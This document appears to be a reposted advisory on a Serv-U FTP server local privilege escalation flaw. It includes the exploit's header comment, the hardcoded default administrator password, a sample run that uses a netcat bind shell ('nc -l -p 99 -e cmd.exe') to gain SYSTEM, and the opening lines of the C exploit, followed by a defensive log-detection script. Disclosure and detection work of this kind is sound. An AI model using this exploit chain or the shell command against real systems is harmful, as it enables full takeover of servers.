Serv-U Local Privilege Escalation Vulnerability
2008-04-09 04:27:32 Source: Internet
Release date: 2004-08-06
Updated: 2004-08-09
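Affected systems:
RhinoSoft Serv-U 5.1.0.0
RhinoSoft Serv-U 5.0.0.9
RhinoSoft Serv-U 5.0.0.4
RhinoSoft Serv-U 5.0
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.1.0.11
RhinoSoft Serv-U 4.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 3.0.0.20
Description:
Serv-U is a very widely used FTP server for the Windows platform.
Serv-U has a design flaw that lets a local attacker execute arbitrary commands on the system with SYSTEM privileges.
All Serv-U versions ship with a default login password for local administration. This account can only connect on the local interface, so a local attacker can connect to Serv-U and create an FTP user with execute permission. Once that user exists, connecting to the FTP server and issuing the "SITE EXEC" command runs the program with SYSTEM privileges.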
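<*Source: aT4r ins4n3 (at4r@ciberdreams.com)
Link: http://marc.theaimsgroup.com/?l=full-disclosure&m=109196729111556&w=2
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!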
/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
*
* All Serv-u Versions have default Login/password for local Administration.
* This account is only available to connect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rights. after the user is created, just connect
* to the ftp server and execute a raw "SITE EXEC" command. the program will
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004 Haxorcitos.com . All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date: 10/2003
* Author: Andrés Tarascó Acunha
*
* Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
*
* Tested Against Serv-u 4.x and v5.1.0.0
G:\exploit\serv-U\local>whoami
INSANE\aT4r
G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos
<220 Serv-U FTP Server v5.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[ ] Creating New Domain...
<200-DomainID=3
220 Domain settings saved
******************************************************
[ ] Domain Haxorcitos:3 Created
[ ] Setting New Domain Online
<220 Server command OK
******************************************************
[ ] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[ ] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[ ] Now Executing: nc -l -p 99 -e cmd.exe
<220 Domain deleted
******************************************************
G:\exploit\serv-U\local>nc localhost 99
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>
//Responses
#define BANNER "220 "
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID "200-DomainID="
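Added example (not part of the original advisory or of the exploit author's code): a defender-side log correlation that flags the chain described above, in which a LocalAdministrator session enters SITE MAINTENANCE and creates a user, and that user then logs in and issues SITE EXEC. The log line layout, the function name find_escalation_chains and the sample log are assumptions constructed for illustration; only the FTP command and response strings come from the transcript above.

```python
import re

# Constructed sample log. The layout (timestamp, [session], client IP,
# direction, text) is an assumption; the FTP strings follow the transcript.
SAMPLE_LOG = """\
2004-08-06 10:00:01 [1] 127.0.0.1 > USER LocalAdministrator
2004-08-06 10:00:01 [1] 127.0.0.1 < 230 User logged in, proceed.
2004-08-06 10:00:02 [1] 127.0.0.1 > SITE MAINTENANCE
2004-08-06 10:00:02 [1] 127.0.0.1 < 200-User=haxorcitos
2004-08-06 10:00:03 [2] 127.0.0.1 > USER haxorcitos
2004-08-06 10:00:03 [2] 127.0.0.1 < 230 User logged in, proceed.
2004-08-06 10:00:04 [2] 127.0.0.1 > SITE EXEC example.exe
2004-08-06 10:05:00 [3] 192.0.2.10 > USER alice
2004-08-06 10:05:00 [3] 192.0.2.10 < 230 User logged in, proceed.
2004-08-06 10:05:01 [3] 192.0.2.10 > RETR report.txt
""".splitlines()

LINE_RE = re.compile(r"^(\S+ \S+) \[(\d+)\] (\S+) ([<>]) (.*)$")

def find_escalation_chains(lines):
    """Flag SITE EXEC issued by an account created from a maintenance session."""
    pending, logged_in = {}, {}   # session -> user name (sent / confirmed by 230)
    maintenance = set()           # sessions where LocalAdministrator sent SITE MAINTENANCE
    created = {}                  # new user name (lowercase) -> creating session
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # ignore lines outside the assumed layout
        ts, sid, ip, direction, text = m.groups()
        if direction == "<":      # server response
            if text.startswith("230 ") and sid in pending:
                logged_in[sid] = pending.pop(sid)
            elif text.startswith("200-User=") and sid in maintenance:
                created[text[len("200-User="):].strip().lower()] = sid
            continue
        verb, _, arg = text.partition(" ")   # client command
        user = logged_in.get(sid, "").lower()
        if verb.upper() == "USER":
            pending[sid] = arg.strip()
        elif verb.upper() == "SITE":
            sub, _, rest = arg.strip().partition(" ")
            if sub.upper() == "MAINTENANCE" and user == "localadministrator":
                maintenance.add(sid)
            elif sub.upper() == "EXEC" and user in created:
                findings.append({"time": ts, "client": ip, "user": user,
                                 "created_in": created[user], "exec_in": sid,
                                 "command": rest})
    return findings
```

Calling find_escalation_chains(SAMPLE_LOG) returns one finding for the haxorcitos account; the ordinary session from 192.0.2.10 produces none.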